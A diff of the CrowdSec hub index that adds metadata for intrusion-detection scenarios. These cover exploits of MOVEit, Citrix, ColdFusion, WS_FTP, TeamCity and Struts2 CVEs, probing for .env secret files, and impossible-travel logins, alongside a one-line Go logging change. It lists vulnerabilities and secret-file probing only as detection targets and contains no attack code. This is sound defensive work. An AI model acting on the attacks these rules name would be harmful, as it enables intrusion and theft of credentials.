+ "label": "MOVEit Transfer - Remote Code Execution (CVE-2023-34362)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-34362"
+ ],
+ "cwes": [
+ "CWE-89"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-3519": {
+ "name": "crowdsecurity/vpatch-CVE-2023-3519",
+ "description": "Detect CVE-2023-3519 exploits ",
+ "label": "Citrix RCE (CVE-2023-3519)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-3519"
+ ],
+ "cwes": [
+ "CWE-94"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-38205": {
+ "name": "crowdsecurity/vpatch-CVE-2023-38205",
+ "description": "Detect CVE-2023-38205 exploits ",
+ "label": "Adobe ColdFusion access control bypass (CVE-2023-38205)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-38205"
+ ],
+ "cwes": [
+ "CWE-284"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-40044": {
+ "name": "crowdsecurity/vpatch-CVE-2023-40044",
+ "description": "Detect CVE-2023-40044 exploits ",
+ "label": "WS_FTP .NET deserialize RCE (CVE-2023-40044)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-40044"
+ ],
+ "cwes": [
+ "CWE-502"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-42793": {
+ "name": "crowdsecurity/vpatch-CVE-2023-42793",
+ "description": "Detect CVE-2023-42793",
+ "label": "JetBrains Teamcity auth bypass (CVE-2023-42793)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-42793"
+ ],
+ "cwes": [
+ "CWE-288"
+ ]
+ },
+ "crowdsecurity/vpatch-CVE-2023-50164": {
+ "name": "crowdsecurity/vpatch-CVE-2023-50164",
+ "description": "Detect CVE-2023-50164 exploits ",
+ "label": "Apache Struts2 (CVE-2023-50164)",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http",
+ "cves": [
+ "CVE-2023-50164"
+ ],
+ "cwes": [
+ "CWE-552"
+ ]
+ },
+ "crowdsecurity/vpatch-env-access": {
+ "name": "crowdsecurity/vpatch-env-access",
+ "description": "Detect access to .env files",
+ "label": "Access to .env file",
+ "behaviors": [
+ "http:scan"
+ ],
+ "mitre_attacks": [
+ "TA0043:T1595",
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http"
+ },
"Dominic-Wagner/vaultwarden-bf": {
"name": "Dominic-Wagner/vaultwarden-bf",
"description": "Detect vaultwarden bruteforce",
@@ -927,6 +1364,21 @@
"CVE-2021-44228"
]
},
+ "crowdsecurity/appsec-vpatch": {
+ "name": "crowdsecurity/appsec-vpatch",
+ "description": "Detect appsec attacks",
+ "label": "appsec blocked",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0006:T1110"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http"
+ },
"crowdsecurity/asterisk_bf": {
"name": "crowdsecurity/asterisk_bf",
"description": "Detect asterisk user bruteforce",
@@ -1337,6 +1789,32 @@
"cti": true,
"service": "cpanel"
},
+ "crowdsecurity/crowdsec-appsec-inband": {
+ "name": "crowdsecurity/crowdsec-appsec-inband",
+ "description": "IP has triggered multiples In Band CrowdSec appsec rules",
+ "label": "Triggered multiple inband CrowdSec appsec rules",
+ "behaviors": [
+ "http:exploit"
+ ],
+ "mitre_attacks": [
+ "TA0001:T1190"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "http"
+ },
+ "crowdsecurity/crowdsec-appsec-outofband": {
+ "name": "crowdsecurity/crowdsec-appsec-outofband",
+ "description": "IP has triggered more than 5 CrowdSec Out Of Band Waap rules",
+ "label": "IP HAS Triggered More Than 5 Crowdsec OUT OF Band Waap Rules",
+ "behaviors": [],
+ "mitre_attacks": [],
+ "confidence": 0,
+ "spoofable": 0,
+ "cti": true,
+ "service": null
+ },
"crowdsecurity/dovecot-spam": {
"name": "crowdsecurity/dovecot-spam",
"description": "detect errors on dovecot",
@@ -1959,6 +2437,32 @@
"cti": true,
"service": "http"
},
+ "crowdsecurity/impossible-travel-user": {
+ "name": "crowdsecurity/impossible-travel-user",
+ "description": "impossible travel user",
+ "label": "Impossible travel",
+ "behaviors": [],
+ "mitre_attacks": [
+ "TA0003:T1078"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "authentication"
+ },
+ "crowdsecurity/impossible-travel": {
+ "name": "crowdsecurity/impossible-travel",
+ "description": "impossible travel",
+ "label": "Impossible travel",
+ "behaviors": [],
+ "mitre_attacks": [
+ "TA0003:T1078"
+ ],
+ "confidence": 3,
+ "spoofable": 0,
+ "cti": true,
+ "service": "authentication"
+ },
"crowdsecurity/iptables-scan-multi_ports": {
"name": "crowdsecurity/iptables-scan-multi_ports",
"description": "ban IPs that are scanning us",
diff --git a/update.go b/update.go
index 542258f59f1..75599d676be 100644
--- a/update.go
+++ b/update.go
@@ -62,7 +62,7 @@ func updateIndex(configType string, idx map[string]map[string]typeInfo, tmpIdx m
var tInfo typeInfo
hubName, err := tInfo.generate(filepath, configType)
if err != nil {
- fmt.Printf("skipping '%s' because : %s\n", filepath, err.Error())
+ fmt.Printf("skipping '%s' for update because : %s\n", filepath, err.Error())
} else {
idx[configType][hubName] = tInfo
}